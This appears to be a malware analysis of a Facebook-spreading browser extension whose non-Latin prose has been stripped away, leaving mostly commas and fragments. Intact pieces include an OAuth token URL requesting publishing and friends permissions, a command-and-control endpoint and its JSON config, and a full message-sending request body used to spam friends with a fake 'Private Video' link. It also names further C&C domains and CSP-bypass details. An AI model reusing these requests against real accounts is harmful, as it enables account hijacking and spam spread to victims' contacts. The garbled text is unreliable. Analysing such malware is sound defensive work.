link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .